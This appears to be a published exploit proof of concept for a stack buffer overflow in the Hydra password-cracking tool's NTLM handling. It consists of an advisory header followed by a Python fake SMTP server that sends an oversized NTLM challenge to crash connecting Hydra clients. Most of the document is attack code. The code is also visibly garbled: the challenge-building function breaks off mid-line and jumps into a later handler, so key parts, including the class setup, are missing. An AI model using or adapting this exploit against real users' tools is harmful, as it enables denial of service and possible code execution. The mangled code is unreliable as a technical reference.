# Exploit Title: Hydra - Stack Buffer Overflow # CVE: CVE-2026-56766 # Date: 2026-06-26 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://github.com/vanhauser-thc/thc-hydra # Software Link: https://github.com/vanhauser-thc/thc-hydra # Affected: Hydra <= 9.7 # Tested on: Hydra 9.5 (Ubuntu 22.04) # Category: Remote # Platform: Linux # Exploit Type: Stack Buffer Overflow # CVSS: 7.5 # Description: Malicious NTLM Type-2 challenge with excessively long domain # causes stack buffer overflow in Hydra's NTLM authentication handler # (SMTP, POP3, IMAP, etc. modules). # Fixed in: https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2 # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Notes: # • Run this PoC server first, then launch vulnerable Hydra against it. # • Triggers SIGSEGV in vulnerable versions. # # How to Use # # Step 1: Run the exploit server: python3 exploit.py # Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import socket import base64 import struct import threading import time import sys NTLMSSP_SIGNATURE = b"NTLMSSP\x00" NTLM_TYPE_2 = 2 def create_ntlm_type2_challenge(): challenge = bytearray(NTLMSSP_SIGNATURE) challenge += struct.pack(" 10: type2 = create_ntlm_type2_challenge() b64_type2 = base64.b64encode(type2).decode('ascii') client.send(f"334 {b64_type2}\r\n".encode()) time.sleep(1) client.recv(8192) client.send(b"235 Authentication successful (fake)\r\n") break elif data.upper().startswith("QUIT"): client.send(b"221 Bye\r\n") break except: break client.close() def start(self): self.sock.bind((self.host, self.port)) self.sock.listen(5) print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}") print("[+] Run: hydra -l test -p test 127.0.0.1 smtp") while True: client, addr = self.sock.accept() threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start() if __name__ == "__main__": banner() try: server = SMTPServer() server.start() except KeyboardInterrupt: print("\n[+] Server stopped") except Exception as e: print(f"[-] Error: {e}")